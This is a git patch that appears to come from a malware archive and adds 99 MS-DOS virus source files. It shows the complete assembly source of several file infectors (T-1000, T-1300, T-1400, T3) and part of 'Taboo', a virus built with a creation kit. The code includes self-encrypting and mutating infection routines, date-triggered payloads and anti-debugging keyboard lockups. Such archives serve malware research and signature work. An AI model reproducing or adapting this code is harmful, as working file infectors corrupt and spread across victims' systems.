From 3e7d2e8262873efbbdf0b961cb116fd292fae079 Mon Sep 17 00:00:00 2001 
From: vxunderground <57078196+vxunderground@users.noreply.github.com> Date: Tue, 12 Jan 2021 18:01:59 -0600 Subject: [PATCH] Add files via upload --- MSDOS/Virus.MSDOS.Unknown.t-1000.asm | 95 + MSDOS/Virus.MSDOS.Unknown.t-1300.asm | 79 + MSDOS/Virus.MSDOS.Unknown.t-1400.asm | 143 + MSDOS/Virus.MSDOS.Unknown.t3.asm | 361 ++ MSDOS/Virus.MSDOS.Unknown.taboo.asm | 539 +++ MSDOS/Virus.MSDOS.Unknown.target.asm | 313 ++ MSDOS/Virus.MSDOS.Unknown.taurus.asm | 378 ++ MSDOS/Virus.MSDOS.Unknown.taz-1973.asm | 278 ++ MSDOS/Virus.MSDOS.Unknown.taz-2197.asm | 276 ++ MSDOS/Virus.MSDOS.Unknown.taz-2208.asm | 240 ++ MSDOS/Virus.MSDOS.Unknown.taz-2209.asm | 238 ++ MSDOS/Virus.MSDOS.Unknown.taz-2276.asm | 278 ++ MSDOS/Virus.MSDOS.Unknown.taz12.asm | 252 ++ MSDOS/Virus.MSDOS.Unknown.tboot.asm | 171 + MSDOS/Virus.MSDOS.Unknown.tbyte.asm | 612 +++ MSDOS/Virus.MSDOS.Unknown.tce.asm | 862 +++++ MSDOS/Virus.MSDOS.Unknown.tenbytes.asm | 826 ++++ MSDOS/Virus.MSDOS.Unknown.tequila.asm | 1089 ++++++ MSDOS/Virus.MSDOS.Unknown.terror.asm | 492 +++ MSDOS/Virus.MSDOS.Unknown.test1.asm | 379 ++ MSDOS/Virus.MSDOS.Unknown.test2.asm | 303 ++ MSDOS/Virus.MSDOS.Unknown.test3.asm | 318 ++ MSDOS/Virus.MSDOS.Unknown.thief.asm | 269 ++ MSDOS/Virus.MSDOS.Unknown.thunder.a86 | 403 ++ MSDOS/Virus.MSDOS.Unknown.thunder.asm | 403 ++ MSDOS/Virus.MSDOS.Unknown.time.asm | 785 ++++ MSDOS/Virus.MSDOS.Unknown.timebomb.asm | 472 +++ MSDOS/Virus.MSDOS.Unknown.timebomb.doc | 19 + MSDOS/Virus.MSDOS.Unknown.timer.asm | 141 + MSDOS/Virus.MSDOS.Unknown.timid.asm | 195 + MSDOS/Virus.MSDOS.Unknown.timid1.asm | 210 ++ MSDOS/Virus.MSDOS.Unknown.tiny-133.asm | 81 + MSDOS/Virus.MSDOS.Unknown.tiny-134.asm | 162 + MSDOS/Virus.MSDOS.Unknown.tiny-138.asm | 168 + MSDOS/Virus.MSDOS.Unknown.tiny-143.asm | 174 + MSDOS/Virus.MSDOS.Unknown.tiny-154.asm | 182 + MSDOS/Virus.MSDOS.Unknown.tiny-156.asm | 182 + MSDOS/Virus.MSDOS.Unknown.tiny-158.asm | 178 + MSDOS/Virus.MSDOS.Unknown.tiny-159.asm | 178 + MSDOS/Virus.MSDOS.Unknown.tiny-160.asm | 
178 + MSDOS/Virus.MSDOS.Unknown.tiny-163.asm | 126 + MSDOS/Virus.MSDOS.Unknown.tiny-167.asm | 177 + MSDOS/Virus.MSDOS.Unknown.tiny-198.asm | 199 + MSDOS/Virus.MSDOS.Unknown.tiny-b.asm | 102 + MSDOS/Virus.MSDOS.Unknown.tiny-c.asm | 101 + MSDOS/Virus.MSDOS.Unknown.tiny-f.asm | 182 + MSDOS/Virus.MSDOS.Unknown.tiny.asm | 120 + MSDOS/Virus.MSDOS.Unknown.tiny133.asm | 94 + MSDOS/Virus.MSDOS.Unknown.tinyd.asm | 116 + MSDOS/Virus.MSDOS.Unknown.tit.asm | 310 ++ MSDOS/Virus.MSDOS.Unknown.tmc_6x9.asm | 4787 ++++++++++++++++++++++++ MSDOS/Virus.MSDOS.Unknown.tmc_b.asm | 4284 +++++++++++++++++++++ MSDOS/Virus.MSDOS.Unknown.tony-f.asm | 201 + MSDOS/Virus.MSDOS.Unknown.torero.asm | 570 +++ MSDOS/Virus.MSDOS.Unknown.torm-205.asm | 158 + MSDOS/Virus.MSDOS.Unknown.torm-358.asm | 160 + MSDOS/Virus.MSDOS.Unknown.torment.asm | 543 +++ MSDOS/Virus.MSDOS.Unknown.totoro.asm | 713 ++++ MSDOS/Virus.MSDOS.Unknown.toys.asm | 381 ++ MSDOS/Virus.MSDOS.Unknown.tpe-gen.asm | 101 + MSDOS/Virus.MSDOS.Unknown.tpe-v11.asm | 1028 +++++ MSDOS/Virus.MSDOS.Unknown.tpe-v12.asm | 990 +++++ MSDOS/Virus.MSDOS.Unknown.tpe-v13.asm | 1009 +++++ MSDOS/Virus.MSDOS.Unknown.tpe_v11.asm | 1028 +++++ MSDOS/Virus.MSDOS.Unknown.tracebck.asm | 1303 +++++++ MSDOS/Virus.MSDOS.Unknown.trash.asm | 169 + MSDOS/Virus.MSDOS.Unknown.trekwar.asm | 185 + MSDOS/Virus.MSDOS.Unknown.tremor.asm | 2266 +++++++++++ MSDOS/Virus.MSDOS.Unknown.trick446.asm | 255 ++ MSDOS/Virus.MSDOS.Unknown.trigger.asm | 500 +++ MSDOS/Virus.MSDOS.Unknown.triv22.asm | 17 + MSDOS/Virus.MSDOS.Unknown.trojan.asm | 69 + MSDOS/Virus.MSDOS.Unknown.tsd1.asm | 260 ++ MSDOS/Virus.MSDOS.Unknown.tsotl-a.asm | 166 + MSDOS/Virus.MSDOS.Unknown.tsotl-b.asm | 322 ++ MSDOS/Virus.MSDOS.Unknown.tsr.asm | 307 ++ MSDOS/Virus.MSDOS.Unknown.tsres.asm | 296 ++ MSDOS/Virus.MSDOS.Unknown.turbo.asm | 324 ++ MSDOS/Virus.MSDOS.Unknown.turbo99.asm | 426 +++ MSDOS/Virus.MSDOS.Unknown.turbo99.lst | 426 +++ MSDOS/Virus.MSDOS.Unknown.turtle.asm | 590 +++ MSDOS/Virus.MSDOS.Unknown.tw.asm | 
407 ++ MSDOS/Virus.MSDOS.Unknown.twelve.asm | 302 ++ MSDOS/Virus.MSDOS.Unknown.twer_com.asm | 59 + MSDOS/Virus.MSDOS.Unknown.typo.asm | 433 +++ MSDOS/Virus.MSDOS.Unknown.ultimute.asm | 584 +++ MSDOS/Virus.MSDOS.Unknown.undr.asm | 126 + MSDOS/Virus.MSDOS.Unknown.unevie.asm | 473 +++ MSDOS/Virus.MSDOS.Unknown.unix.txt | 63 + MSDOS/Virus.MSDOS.Unknown.ussr516.asm | 278 ++ MSDOS/Virus.MSDOS.Unknown.ussr707.asm | 408 ++ MSDOS/Virus.MSDOS.Unknown.ussr711.asm | 384 ++ MSDOS/Virus.MSDOS.Unknown.utility.asm | 33 + MSDOS/Virus.MSDOS.Unknown.v_582.asm | 324 ++ MSDOS/Virus.MSDOS.Unknown.v_822.asm | 669 ++++ MSDOS/Virus.MSDOS.Unknown.v_822.lst | 669 ++++ MSDOS/Virus.MSDOS.Unknown.v_dos625.asm | 571 +++ MSDOS/Virus.MSDOS.Unknown.v_dos625.lst | 571 +++ MSDOS/Virus.MSDOS.Unknown.v_dq1028.asm | 533 +++ 99 files changed, 45150 insertions(+) create mode 100644 MSDOS/Virus.MSDOS.Unknown.t-1000.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.t-1300.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.t-1400.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.t3.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.taboo.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.target.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.taurus.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.taz-1973.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.taz-2197.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.taz-2208.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.taz-2209.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.taz-2276.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.taz12.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.tboot.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.tbyte.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.tce.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.tenbytes.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.tequila.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.terror.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.test1.asm create mode 100644 
MSDOS/Virus.MSDOS.Unknown.test2.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.test3.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.thief.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.thunder.a86 create mode 100644 MSDOS/Virus.MSDOS.Unknown.thunder.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.time.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.timebomb.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.timebomb.doc create mode 100644 MSDOS/Virus.MSDOS.Unknown.timer.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.timid.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.timid1.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.tiny-133.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.tiny-134.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.tiny-138.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.tiny-143.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.tiny-154.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.tiny-156.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.tiny-158.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.tiny-159.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.tiny-160.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.tiny-163.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.tiny-167.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.tiny-198.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.tiny-b.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.tiny-c.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.tiny-f.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.tiny.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.tiny133.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.tinyd.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.tit.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.tmc_6x9.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.tmc_b.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.tony-f.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.torero.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.torm-205.asm create mode 100644 
MSDOS/Virus.MSDOS.Unknown.torm-358.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.torment.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.totoro.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.toys.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.tpe-gen.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.tpe-v11.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.tpe-v12.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.tpe-v13.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.tpe_v11.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.tracebck.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.trash.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.trekwar.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.tremor.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.trick446.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.trigger.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.triv22.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.trojan.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.tsd1.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.tsotl-a.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.tsotl-b.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.tsr.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.tsres.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.turbo.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.turbo99.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.turbo99.lst create mode 100644 MSDOS/Virus.MSDOS.Unknown.turtle.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.tw.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.twelve.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.twer_com.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.typo.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.ultimute.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.undr.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.unevie.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.unix.txt create mode 100644 MSDOS/Virus.MSDOS.Unknown.ussr516.asm create mode 100644 
MSDOS/Virus.MSDOS.Unknown.ussr707.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.ussr711.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.utility.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.v_582.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.v_822.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.v_822.lst create mode 100644 MSDOS/Virus.MSDOS.Unknown.v_dos625.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.v_dos625.lst create mode 100644 MSDOS/Virus.MSDOS.Unknown.v_dq1028.asm diff --git a/MSDOS/Virus.MSDOS.Unknown.t-1000.asm b/MSDOS/Virus.MSDOS.Unknown.t-1000.asm new file mode 100644 index 00000000..a1780180 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.t-1000.asm 
@@ -0,0 +1,95 @@ +; +; T-1000 Virus +; +; This virus is a Non-Resident Overwriting Self-Encrypting .COM File Inctector. +; When an infected program is started, the virus will infect all files in the +; current directory and use the time counter for its encryption. It displays +; the text "T-1000" when it is ready infecting. + +Code Segment para 'code' + Assume Cs:Code,Ds:Code + +Length Equ Offset EndByte-Offset Main + + Org 100h + +Main: Mov Si,Offset Decrypt + Mov Di,Si + Mov Cl,Offset EndByte-Offset Decrypt +On2: Lodsb + Db 34h +Crypt Db 0 + Stosb + Dec Cl + Cmp Cl,0ffh + Jne On2 + +Decrypt: + Mov Ah,4eh + Push Ax + +Encr: + Mov Ah,2ch + Int 21h + Mov Crypt,Dl + Mov Si,Offset Decrypt + Mov Di,Offset EndByte+10 + Mov Cx,Offset EndByte-Offset Decrypt +On3: Lodsb + Xor Al,Crypt + Stosb + Dec Cx + Cmp Cx,0ffffh + Jne On3 + + Pop Ax +On1: Xor Cx,Cx + Mov Dx,Offset Nam + Int 21h + Jc Einde + + Mov Ax,3d01h + Mov Dx,9eh + Int 21h + Mov Bx,Ax + + Mov Ah,40h + Push Ax + Mov Cx,Offset Decrypt-Offset Main + Mov Dx,Offset Main + Int 21h + + Pop Ax + Mov Cx,Offset EndByte-Offset Decrypt + Mov Dx,Offset EndByte+10 + Int 21h + + Mov Ah,3eh + Int 21h + + Mov Ah,4fh + Push Ax + Jmp Short Encr + +Einde: + Mov Ah,9 + Mov Dx,Offset Msg + Push Cs + Pop Ds + Int 21h + Int 20h + +Msg Db 'T-1000$' + +Nam Db '*.Com',0 + +EndByte Db 0 + +Code Ends + End Main + + +; +; > and Remember Don't Forget to Call < +; > ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? < +; diff --git a/MSDOS/Virus.MSDOS.Unknown.t-1300.asm b/MSDOS/Virus.MSDOS.Unknown.t-1300.asm new file mode 100644 index 00000000..76e1e7ff --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.t-1300.asm 
@@ -0,0 +1,79 @@ +; +; T-1300 Virus +; +; This is a non-resident overwriting self-encrypting semi-mutating .exe file +; infector. When an infected program is run, the virus will infect all the +; file in the current directory and displays "T-1300" when finished with +; infecting. This is a bit more advanced virus than "T-1000" and a wildcard +; scanstring is needed to find this virus. +; +S_1: Lea Si,Main + Mov Cx,MainLen +Length Equ $-2 +Decrypt: Xor B [Si],0 +CryptByte Equ $-1 +S_2 Equ $-2 +S_3: Inc Si +S_4: Loop Decrypt +CryptLen Equ $-S_1 +Main: Mov Ah,4eh +SeekNext: Lea Dx,FileSpec + Xor Cx,Cx + Int 21h + Jc Einde + Mov Ax,3d02h + Mov Dx,09eh + Int 21h + Xchg Ax,Bx + Mov Ds,Cx + Inc Cx + Mov Ah,B Ds:[46ch] + Mov Ds,Cs + Mov B CryptByte,Ah + Test Ah,1 + Jne NoReg + Xor B S_1,Cl + Xor B S_2,Cl + Xor B S_3,Cl +NoReg: Test Ah,2 + Jne NoXor + Xor B Decrypt,2 +NoXor: Test Ah,4 + Jne NoLoop + Xor B S_4,2 +NoLoop: Lea Si,Main + Lea Di,CryptPart + Mov Cx,MainLen + Push Cx +CodeIt: Lodsb + Xor Al,Ah + Stosb + Loop CodeIt + Pop Cx + And Ax,03fffh + Add Cx,Ax + Mov W Length,Cx + Mov Ah,40h + Lea Dx,S_1 + Mov Cx,CryptLen + Int 21h + Mov Ah,40h + Lea Dx,CryptPart + Mov Cx,MainLen + Int 21h + Mov Ah,3eh + Int 21h + Mov Ah,4fh + Jmp SeekNext +Einde: Mov Ah,9 + Lea Dx,Msg + Int 21h + Ret + +FileSpec Db '*.EXE',0 + +Msg Db 'T-1300$' + +MainLen Equ $-Main + +CryptPart Equ $ diff --git a/MSDOS/Virus.MSDOS.Unknown.t-1400.asm b/MSDOS/Virus.MSDOS.Unknown.t-1400.asm new file mode 100644 index 00000000..dd59f905 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.t-1400.asm 
@@ -0,0 +1,143 @@ +; +; T-1400 Virus +; +; This is a non-resident overwriting self-encrypting semi-mutating .COM file +; infector. When an infected program is run, the virus will infect all the +; file in the current directory and displays a TridenT logo when finished with +; infecting. This is a bit more advanced virus than "T-1300" and a wildcard +; scanstring is needed to find this virus. It now utilizes three types of +; encryption, instead of only the XOR loop. it now utilizes ADD, ADC, SUB and +; SBB. the increment SI has now a new +; possibility, CMPSB. +; +Beg: + Mov Cx,MainLen +Length Equ $-2 +S_1: Lea Si,Main +Zaken: Clc +Decrypt: Xor B [Si],0 +CryptByte Equ $-1 +S_2 Equ $-2 +S_3: Inc Si +S_4: Loop Zaken +CryptLen Equ $-Beg +Main: Mov Ah,4eh +SeekNext: Lea Dx,FileSpec + Xor Cx,Cx + Int 21h + Jnc Yup + Jmp Einde +Yup: Mov Ax,3d02h + Mov Dx,09eh + Int 21h + Xchg Ax,Bx + Mov Ds,Cx + Inc Cx + Mov Ax,W Ds:[46ch] + + Mov Ds,Cs + Mov B CryptByte,Ah + Mov B Zaken,0f8h + + Mov B What,1 + Mov B S_2,34h + Test Al,1 + Jne NotXor + Test Al,32 + Jne Done + Xor B Zaken,1 + Jmp Done +NotXor: Mov B What,2 + Mov B S_2,04h + Test Al,2 + Je Done + Test Al,4 + Je ItsAdc + Mov B What,3 + Mov B S_2,2ch + Test Al,8 + Je Done + Sub B S_2,20h +ItsAdc: Add B S_2,10h +Done: Mov B S_1,0beh + Cmp Ah,80h + Ja NoCMPSB + Mov B S_3,0A6h + Jmp Next +NoCMPSB: Mov B S_3,46h +Next: Test Ah,1 + Jne NoReg + Xor B S_1,Cl + Xor B S_2,Cl + Cmp Ah,80h + Jbe NoReg + Xor B S_3,Cl +NoReg: Test Ah,2 + Jne NoXor + Xor B Decrypt,2 +NoXor: Test Ah,4 + Jne NoLoop + Xor B S_4,2 +NoLoop: Test Ah,8 + Jne Ok + Mov B S_4,0E2h +Ok: Lea Si,Main + Lea Di,CryptPart + Mov Cx,MainLen + Push Cx +CodeIt: Lodsb + Cmp B What,1 + Jne NeXor + Xor Al,Ah + Jmp Stor +NeXor: Cmp B What,2 + Jne NeSub + Sub Al,Ah + Jmp Stor +NeSub: Add Al,Ah +Stor: Stosb + Loop CodeIt + Pop Cx + And Ax,03fffh + Add Cx,Ax + Mov W Length,Cx + Mov Ah,40h + Lea Dx,Beg + Mov Cx,CryptLen + Int 21h + Mov Ah,40h + Lea Dx,CryptPart + Mov Cx,MainLen + Int 
21h + Mov Ah,3eh + Int 21h + Mov Ah,4fh + Jmp SeekNext +What Db 0 +Einde: + Mov Al,3 + Int 10h + Lea Si,Y + R: Lodsb + Mov Cl,8 + C: Rol Al,1 + Push Ax + Mov Al,32 + If C Mov Al,219 + Int 29h + Int 29h + Pop Ax + Loop C + Cmp Si,E + Jne R + Ret + Y: db 125,231,121,244,95,17,18,69,6,68,17,226,69,197,68,17,18,69,4,196,17,23,121,244,68 + E: + +FileSpec Db '*.COM',0 + +Msg Db 'T-1400' + +MainLen Equ $-Main + +CryptPart Equ $ diff --git a/MSDOS/Virus.MSDOS.Unknown.t3.asm b/MSDOS/Virus.MSDOS.Unknown.t3.asm new file mode 100644 index 00000000..b6c0dc6c --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.t3.asm 
@@ -0,0 +1,361 @@ +;LiquidCode --- T3 +; +; Virus +;This version: +;Searches current directory for non-infected com files, if any found +;it will become infected! +;This virus has a routine which self-destructs itself and uninfects +;the file. + assume cs:code + .286 +code segment "code" + org 0100h +start proc + jmp v_start ;first 5 bytes | + nop ; | + nop ; | +v_start: + call $+3 ;Actual virus + pop dx + sub dx, 3 + push dx ;save relocation factor in BP + pop bp ;so virus can be copied anywhere twoards + mov si, dx ;the end of the file + ; +; Replace first 5 bytes in memory with original +; program code so normal program can run later + add si, first_five + mov di, 0100h + mov cx, 5 + lodsb + stosb + loop $-2 +;see if user want to disinfect this file +; mov si, 82h +; lodsb +; cmp al, "[" ;is al the code to disinfect? "[" +; jne ok_dont_disinfect +; jmp self_kill +ok_dont_disinfect: + ;here should be date checks to see + ;if an evil function should be unleashed!! + mov ah, 2ah + int 21h + ;cx year 1980-2099 + ;dh month 1-12 + ;dl day + ;al day of week 0=sun 1=mon -> 7=sat + cmp dh, 12 + jne notdec + cmp dl, 25 + jne notdec + jmp christmas +notdec: + cmp dh, 4 + jne notapril + cmp dl, 1 + jne notapril +; jmp aprilfools +notapril: + +;Set the DTA + call set_dta + ;find first file to ?infect? + call find_first_file +go_again: + mov si, bp + add si, size_ + lodsw + cmp ax, 5 + ja gd4 + jmp resrch +gd4: + call open_file + mov bx, ax + mov al, 0 + call date_time + mov ah, 3fh + mov cx, 5 + mov dx, bp + add dx, first_five + int 21h +;**** mov ax, 4202h + mov cx, 0 + mov ax, 4202h + mov dx, cx + int 21h + sub ax, 3 + mov si, bp + add si, new_5 + mov [si+1], ax + mov si, bp + mov di, si + add si, chkmark + add di, mark + mov cx, 2 + repe cmpsb + jne INFECT +;File found was previously infected! +; search for new one now. 
+ jmp resrch + +wipe_name: + push di + push ax + push cx + mov di, bp + add di, name_ + mov cx, 13 + mov al, 0 + rep stosb + pop cx + pop ax + pop di + ret +resrch: + call wipe_name + mov ah, 4fh + int 21h + jnc gd3 + jmp term_virus +gd3: + jmp go_again +INFECT: +;Time to infect the file!! + mov si, bp + add si, handle + mov bx, [si] + mov cx, vsize + mov dx, bp + call wipe_name + mov ax, 4000h + int 21h + mov ax, 4200h + mov cx, 0 + mov dx, cx + int 21h + mov dx, bp + add dx, new_5 + mov ax, 4000h + mov cx, 5 + int 21h + mov al, 1 + call date_time + mov ax, 3e00h + int 21h + jmp resrch + +fndnam proc + mov si, env + mov ax, [si] + mov es, ax + mov ds, ax + mov si, 0 + mov di, si +__lp: + lodsb + cmp al, 0 + je chknxt + stosb + jmp __lp +chknxt: + stosb + lodsb + cmp al, 0 + je fnd1 + stosb + jmp __lp +fnd1: + stosb +__lp2: + lodsb + cmp al, "a" + jae ff_ +up2: + cmp al, "A" + jae fff_ +up3: + stosb + jmp __lp2 +ff_: + cmp al,"z" + jbe fnd + jmp up2 +fff_: + cmp al, "Z" + jbe fnd + jmp up3 +fnd: + mov si, di + mov al, 0 + repne scasb + mov dx, si + mov di, dx + ret +env equ 2ch +fndnam endp + + +self_kill: + ;this procedure disinfects specified files + ;SI points to the name of current file on disk + ;which is infected + call fndnam ;find name of current file from env block in memory + jmp gd__ +abrt: + int 20h +gd__: + mov ax, 3d02h + int 21h + jc abrt + mov bx, ax + mov ax, cs + mov ds, ax + mov es, ax + mov cx, 5 + mov dx, bp + add dx, first_five + call wipe_name + mov ax, 4000h + int 21h + jc abrt + mov dx, 0 + mov cx, 0 + mov ax, 4202h + int 21h + jnc gd__1 + jmp abrt +gd__1: + sub ax, vsize + mov dx, ax + mov cx, 0 + mov ax, 4200h + int 21h + call wipe_name + mov cx, 0 + mov ax, 4000h + int 21h + mov ax, 3e00h + int 21h + jmp term_virus +date_time: + pusha + mov ah, 57h + cmp al, 0 + je fnd__$ + mov di, bp + mov si, di + add di, date + add si, time + mov dx, [di] + mov cx, [si] + int 21h + jmp ret__ +fnd__$: + int 21h + mov si, bp + mov di, bp + add si, time 
+ add di, date + mov [si], cx + mov [di], dx +ret__: + popa + ret +open_file: + mov dx, bp + add dx, name_ + mov ax, 3d02h + int 21h + jnc gd2 + jmp term_virus +gd2: + mov si, bp + add si, handle + mov [si], ax + ret +find_first_file: + mov dx, bp + mov cx, 0 + mov ah, 4eh + add dx, all_com_files + int 21h + jnc gd1 + jmp term_virus +gd1: + ret +set_dta: + mov dx, bp + mov ah, 1ah + add dx, dta + int 21h + ret +term_virus: + mov ax, 0 + mov bx, ax + mov cx, bx + mov dx, cx + mov si, 0100h + mov di, -1 + mov bp, di + push 0100h + ret + +CHRISTMAS: +;Program Lockup +; Exit without running program + int 20h +;APRILFOOLS: +;Ha Ha delete current file +; call fndnam +; mov ah, 41h +; int 21h +; mov ax, cs +; mov ds, ax +; mov es, ax +; jmp term_virus +; Data Bank +_fstfive: + int 20h + nop +ckmrk: + nop + nop +acf db "*.COM",0 +dt_ dw 0 +tme dw 0 +d_t_a: + rfd db 21 dup (0) + att db 0 + dw 0 + dw 0 + sz dd 0 + n_me db 13 dup (0),0 +handl dw 0 +nw_5 db 0e9h,0,0 +mrk db " " +strain db "LiquidCode 92" +; +end___: +first_five = offset _fstfive-0105h +all_com_files = offset acf-0105h +dta = offset d_t_a-0105h +attribute = offset att-0105h +time = offset tme-0105h +date = offset dt_-0105h +size_ = offset sz-0105h +name_ = offset n_me-0105h +handle = offset handl-0105h +new_5 = offset nw_5-0105h +mark = offset mrk-0105h +chkmark = offset ckmrk-0105h +vsize = offset end___-0105h +start endp +code ends + end start +  +; +; > and Remember Don't Forget to Call < +; > ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? < +; + diff --git a/MSDOS/Virus.MSDOS.Unknown.taboo.asm b/MSDOS/Virus.MSDOS.Unknown.taboo.asm new file mode 100644 index 00000000..015cc6ab --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.taboo.asm 
@@ -0,0 +1,539 @@ +; TABOO.ASM -- Taboo Virus +; Created with Nowhere Man's Virus Creation Laboratory v1.00 +; Written by Virucidal Maniac + +virus_type equ 2 ; Spawning Virus +is_encrypted equ 1 ; We're encrypted +tsr_virus equ 0 ; We're not TSR + +code segment byte public + assume cs:code,ds:code,es:code,ss:code + org 0100h + +start label near + +main proc near + call encrypt_decrypt ; Decrypt the virus + +start_of_code label near + +stop_tracing: mov cx,09EBh + mov ax,0FE05h ; Acutal move, plus a HaLT + jmp $-2 + add ah,03Bh ; AH now equals 025h + jmp $-10 ; Execute the HaLT + mov bx,offset null_vector ; BX points to new routine + push cs ; Transfer CS into ES + pop es ; using a PUSH/POP + int 021h + mov al,1 ; Disable interrupt 1, too + int 021h + jmp short skip_null ; Hop over the loop +null_vector: jmp $ ; An infinite loop +skip_null: mov byte ptr [lock_keys + 1],130 ; Prefetch unchanged +lock_keys: mov al,128 ; Change here screws DEBUG + out 021h,al ; If tracing then lock keyboard + + + mov ah,04Ah ; DOS resize memory function + mov bx,(finish - start) / 16 + 0272h ; BX holds # of para. + int 021h + + mov sp,(finish - start) + 01100h ; Change top of stack + + mov si,offset spawn_name ; SI points to true filename + int 02Eh ; DOS execution back-door + push ax ; Save return value for later + + mov ax,cs ; AX holds code segment + mov ds,ax ; Restore data segment + mov es,ax ; Restore extra segment + + mov cx,0003h ; Do 3 infections +search_loop: push cx ; Save CX + call search_files ; Find and infect a file + pop cx ; Restore CX + loop search_loop ; Repeat until CX is 0 + + xor ah,ah ; BIOS get time function + int 01Ah + test dx,0001h ; Is timer divisible by 2? + jne no_infection ; If not then don't spread + call search_files ; Find and infect a file +no_infection: + call get_day + cmp ax,000Fh ; Did the function return 15? + je strt00 ; If equal, do effect + call get_cpu + cmp ax,01E6h ; Did the function return 486? 
